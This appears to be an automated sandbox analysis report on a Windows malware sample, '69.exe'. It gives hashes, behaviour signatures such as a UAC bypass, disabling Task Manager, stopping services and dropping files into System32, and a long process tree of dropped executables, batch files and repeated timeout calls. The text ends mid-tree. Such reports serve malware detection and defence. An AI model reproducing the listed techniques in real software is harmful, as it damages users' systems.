Resubmissions

10-10-2024 22:41

241010-2mlydswbmn 10

21-09-2024 20:56

240921-zq2f5stcqk 3

21-09-2024 19:40

240921-ydv8xszdjp 10

21-09-2024 19:07

240921-xszn8aybqe 10

Analysis

  • max time kernel
    9s
  • max time network
    25s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    21-09-2024 19:40

Errors

Reason
Machine shutdown

General

  • Target

    69.exe

  • Size

    2.4MB

  • MD5

    165b9d15346eed1bd8da9780eb7ab4bf

  • SHA1

    a9895dca7b49cd345634809d03baa51d5078c639

  • SHA256

    6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7

  • SHA512

    b70d1ca87b71b2d0b9611e51e0a26e27b7d1a75072113965cbced770e3f46d9b7147225cb566ec06cac2921f8e4860faf882f96d2a866b2408dfacd4aaeecbf7

  • SSDEEP

    49152:GpUlRhMQfcBROIbrGTPmbpzyLdKDfWLDooV9VwwzuDDFDdexGQw:GpUlBcjnpkwfkkS9V/YTAGj

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 8 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 3 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Modifies system executable filetype association 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 64 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69.exe
    "C:\Users\Admin\AppData\Local\Temp\69.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\PerfLogs\windows\exec.exe
        "C:\PerfLogs\windows\exec.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2244
        • C:\Windows\system32\cmd.exe
          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A2F7.tmp\A2F8.tmp\A2F9.bat C:\PerfLogs\windows\exec.exe"
          4⤵
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:2384
          • C:\PerfLogs\windows\jumpscare.exe
            jumpscare.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2856
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A41F.tmp\A420.tmp\A421.bat C:\PerfLogs\windows\jumpscare.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:640
              • C:\Program Files\Windows Media Player\wmplayer.exe
                wmplayer.exe "C:\PerfLogs\windows\tape.mp4"
                7⤵
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:5076
                • C:\Windows\System32\unregmp2.exe
                  "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
                  8⤵
                  • Enumerates connected drives
                  • Suspicious use of AdjustPrivilegeToken
                  PID:708
          • C:\PerfLogs\windows\rnbowspam.exe
            rnbowspam.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3712
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A420.tmp\A420.tmp\A421.bat C:\PerfLogs\windows\rnbowspam.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3664
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /K rainbow.bat
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4964
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                    PID:1596
                  • C:\Windows\system32\timeout.exe
                    timeout /t 0
                    8⤵
                    • Delays execution with timeout.exe
                    PID:916
                  • C:\Windows\system32\timeout.exe
                    timeout /t 0
                    8⤵
                      PID:1484
                    • C:\Windows\system32\timeout.exe
                      timeout /t 0
                      8⤵
                        PID:2056
                      • C:\Windows\system32\timeout.exe
                        timeout /t 0
                        8⤵
                          PID:3048
                        • C:\Windows\system32\timeout.exe
                          timeout /t 0
                          8⤵
                            PID:1636
                          • C:\Windows\system32\timeout.exe
                            timeout /t 0
                            8⤵
                            • Delays execution with timeout.exe
                            PID:2160
                          • C:\Windows\system32\timeout.exe
                            timeout /t 0
                            8⤵
                            • Delays execution with timeout.exe
                            PID:2168
                          • C:\Windows\system32\timeout.exe
                            timeout /t 0
                            8⤵
                              PID:1528
                            • C:\Windows\system32\timeout.exe
                              timeout /t 0
                              8⤵
                                PID:4432
                              • C:\Windows\system32\timeout.exe
                                timeout /t 0
                                8⤵
                                  PID:1608
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 0
                                  8⤵
                                    PID:2560
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 0
                                    8⤵
                                      PID:2708
                                    • C:\Windows\system32\timeout.exe
                                      timeout /t 0
                                      8⤵
                                      • Delays execution with timeout.exe
                                      PID:1784
                                    • C:\Windows\system32\timeout.exe
                                      timeout /t 0
                                      8⤵
                                        PID:4708
                                      • C:\Windows\system32\timeout.exe
                                        timeout /t 0
                                        8⤵
                                          PID:1280
                                        • C:\Windows\system32\timeout.exe
                                          timeout /t 0
                                          8⤵
                                          • Delays execution with timeout.exe
                                          PID:3024
                                        • C:\Windows\system32\timeout.exe
                                          timeout /t 0
                                          8⤵
                                            PID:3460
                                          • C:\Windows\system32\timeout.exe
                                            timeout /t 0
                                            8⤵
                                              PID:708
                                            • C:\Windows\system32\timeout.exe
                                              timeout /t 0
                                              8⤵
                                              • Delays execution with timeout.exe
                                              PID:2980
                                            • C:\Windows\system32\timeout.exe
                                              timeout /t 0
                                              8⤵
                                              • Delays execution with timeout.exe
                                              PID:3076
                                            • C:\Windows\system32\timeout.exe
                                              timeout /t 0
                                              8⤵
                                                PID:1012
                                              • C:\Windows\system32\timeout.exe
                                                timeout /t 0
                                                8⤵
                                                  PID:1004
                                                • C:\Windows\system32\timeout.exe
                                                  timeout /t 0
                                                  8⤵
                                                    PID:4432
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /t 0
                                                    8⤵
                                                      PID:1480
                                                    • C:\Windows\system32\timeout.exe
                                                      timeout /t 0
                                                      8⤵
                                                        PID:3128
                                                      • C:\Windows\system32\timeout.exe
                                                        timeout /t 0
                                                        8⤵
                                                        • Delays execution with timeout.exe
                                                        PID:2024
                                                      • C:\Windows\system32\timeout.exe
                                                        timeout /t 0
                                                        8⤵
                                                          PID:1112
                                                        • C:\Windows\system32\timeout.exe
                                                          timeout /t 0
                                                          8⤵
                                                            PID:2180
                                                          • C:\Windows\system32\timeout.exe
                                                            timeout /t 0
                                                            8⤵
                                                              PID:2540
                                                            • C:\Windows\system32\timeout.exe
                                                              timeout /t 0
                                                              8⤵
                                                              • Delays execution with timeout.exe
                                                              PID:1460
                                                            • C:\Windows\system32\timeout.exe
                                                              timeout /t 0
                                                              8⤵
                                                                PID:1592
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 0
                                                                8⤵
                                                                  PID:1500
                                                                • C:\Windows\system32\timeout.exe
                                                                  timeout /t 0
                                                                  8⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:2756
                                                                • C:\Windows\system32\timeout.exe
                                                                  timeout /t 0
                                                                  8⤵
                                                                    PID:1484
                                                                  • C:\Windows\system32\timeout.exe
                                                                    timeout /t 0
                                                                    8⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:796
                                                                  • C:\Windows\system32\timeout.exe
                                                                    timeout /t 0
                                                                    8⤵
                                                                      PID:1840
                                                                    • C:\Windows\system32\timeout.exe
                                                                      timeout /t 0
                                                                      8⤵
                                                                        PID:4724
                                                                      • C:\Windows\system32\timeout.exe
                                                                        timeout /t 0
                                                                        8⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:2896
                                                                      • C:\Windows\system32\timeout.exe
                                                                        timeout /t 0
                                                                        8⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:924
                                                                      • C:\Windows\system32\timeout.exe
                                                                        timeout /t 0
                                                                        8⤵
                                                                          PID:3552
                                                                        • C:\Windows\system32\timeout.exe
                                                                          timeout /t 0
                                                                          8⤵
                                                                            PID:4444
                                                                          • C:\Windows\system32\timeout.exe
                                                                            timeout /t 0
                                                                            8⤵
                                                                              PID:5100
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout /t 0
                                                                              8⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:2024
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout /t 0
                                                                              8⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:1600
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout /t 0
                                                                              8⤵
                                                                                PID:3920
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 0
                                                                                8⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:1580
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 0
                                                                                8⤵
                                                                                  PID:3024
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  timeout /t 0
                                                                                  8⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:3248
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  timeout /t 0
                                                                                  8⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:2668
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  timeout /t 0
                                                                                  8⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:2980
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  timeout /t 0
                                                                                  8⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:2808
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  timeout /t 0
                                                                                  8⤵
                                                                                    PID:4960
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout /t 0
                                                                                    8⤵
                                                                                      PID:4292
                                                                                    • C:\Windows\system32\timeout.exe
                                                                                      timeout /t 0
                                                                                      8⤵
                                                                                        PID:3712
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        timeout /t 0
                                                                                        8⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:2300
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        timeout /t 0
                                                                                        8⤵
                                                                                          PID:1780
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          timeout /t 0
                                                                                          8⤵
                                                                                            PID:4284
                                                                                          • C:\Windows\system32\timeout.exe
                                                                                            timeout /t 0
                                                                                            8⤵
                                                                                              PID:328
                                                                                            • C:\Windows\system32\timeout.exe
                                                                                              timeout /t 0
                                                                                              8⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:3464
                                                                                            • C:\Windows\system32\timeout.exe
                                                                                              timeout /t 0
                                                                                              8⤵
                                                                                                PID:3920
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                timeout /t 0
                                                                                                8⤵
                                                                                                  PID:3784
                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                  timeout /t 0
                                                                                                  8⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:1280
                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                  timeout /t 0
                                                                                                  8⤵
                                                                                                    PID:1808
                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                    timeout /t 0
                                                                                                    8⤵
                                                                                                      PID:2480
                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                      timeout /t 0
                                                                                                      8⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:1904
                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                    timeout /t 1
                                                                                                    7⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:1344
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /K rainbow.bat
                                                                                                    7⤵
                                                                                                      PID:2040
                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                        timeout /t 0
                                                                                                        8⤵
                                                                                                          PID:2500
                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                          timeout /t 0
                                                                                                          8⤵
                                                                                                            PID:3628
                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                            timeout /t 0
                                                                                                            8⤵
                                                                                                              PID:2776
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              timeout /t 0
                                                                                                              8⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:1004
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              timeout /t 0
                                                                                                              8⤵
                                                                                                                PID:2504
                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                timeout /t 0
                                                                                                                8⤵
                                                                                                                  PID:2768
                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                  timeout /t 0
                                                                                                                  8⤵
                                                                                                                    PID:4084
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 0
                                                                                                                    8⤵
                                                                                                                      PID:1744
                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                      timeout /t 0
                                                                                                                      8⤵
                                                                                                                        PID:4748
                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                        timeout /t 0
                                                                                                                        8⤵
                                                                                                                          PID:3000
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout /t 0
                                                                                                                          8⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:1948
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout /t 0
                                                                                                                          8⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:2068
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout /t 0
                                                                                                                          8⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:1832
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout /t 0
                                                                                                                          8⤵
                                                                                                                            PID:3456
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout /t 0
                                                                                                                            8⤵
                                                                                                                              PID:4988
                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                              timeout /t 0
                                                                                                                              8⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:1472
                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                              timeout /t 0
                                                                                                                              8⤵
                                                                                                                                PID:3856
                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                timeout /t 0
                                                                                                                                8⤵
                                                                                                                                  PID:2056
                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                  timeout /t 0
                                                                                                                                  8⤵
                                                                                                                                    PID:2504
                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                    timeout /t 0
                                                                                                                                    8⤵
                                                                                                                                      PID:1416
                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                      timeout /t 0
                                                                                                                                      8⤵
                                                                                                                                        PID:1596
                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                        timeout /t 0
                                                                                                                                        8⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:4900
                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                        timeout /t 0
                                                                                                                                        8⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:3664
                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                        timeout /t 0
                                                                                                                                        8⤵
                                                                                                                                          PID:3644
                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                          timeout /t 0
                                                                                                                                          8⤵
                                                                                                                                            PID:3404
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            timeout /t 0
                                                                                                                                            8⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:3464
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            timeout /t 0
                                                                                                                                            8⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:3632
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            timeout /t 0
                                                                                                                                            8⤵
                                                                                                                                              PID:760
                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                              timeout /t 0
                                                                                                                                              8⤵
                                                                                                                                                PID:3024
                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                timeout /t 0
                                                                                                                                                8⤵
                                                                                                                                                  PID:3460
                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                  timeout /t 0
                                                                                                                                                  8⤵
                                                                                                                                                    PID:2668
                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                    timeout /t 0
                                                                                                                                                    8⤵
                                                                                                                                                      PID:396
                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                      timeout /t 0
                                                                                                                                                      8⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:2288
                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                      timeout /t 0
                                                                                                                                                      8⤵
                                                                                                                                                        PID:1012
                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                        timeout /t 0
                                                                                                                                                        8⤵
                                                                                                                                                          PID:8
                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                          timeout /t 0
                                                                                                                                                          8⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:908
                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                          timeout /t 0
                                                                                                                                                          8⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:5020
                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                          timeout /t 0
                                                                                                                                                          8⤵
                                                                                                                                                            PID:1732
                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                            timeout /t 0
                                                                                                                                                            8⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:4292
                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                            timeout /t 0
                                                                                                                                                            8⤵
                                                                                                                                                              PID:1996
                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                              timeout /t 0
                                                                                                                                                              8⤵
                                                                                                                                                                PID:4772
                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                timeout /t 0
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:4708
                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                  timeout /t 0
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:2220
                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                  timeout /t 0
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:4568
                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                  timeout /t 0
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:2888
                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                    timeout /t 0
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:4988
                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                      timeout /t 0
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:784
                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                        timeout /t 0
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:1368
                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                          timeout /t 0
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                          PID:1152
                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                          timeout /t 0
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:3828
                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                            timeout /t 0
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:4924
                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                            timeout /t 0
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:1284
                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                              timeout /t 0
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:1552
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:3080
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:2132
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:800
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:644
                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:2332
                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:3468
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:1636
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:2756
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:2808
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /K rainbow.bat
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:4636
                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                        timeout /t 0
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:4000
                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                          PID:800
                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:4692
                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                            timeout /t 0
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:2720
                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:4744
                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:2696
                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                PID:644
                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:3468
                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:1636
                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:408
                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                      PID:3248
                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:2888
                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                        timeout /t 0
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:2688
                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:2892
                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                            timeout /t 0
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:4960
                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:3536
                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:4532
                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:5084
                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:884
                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                  PID:4292
                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:2300
                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:4756
                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                      PID:1492
                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                      PID:3920
                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                      PID:4708
                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:1580
                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                        timeout /t 0
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:1808
                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:1920
                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                            timeout /t 0
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:3924
                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:1104
                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:2980
                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
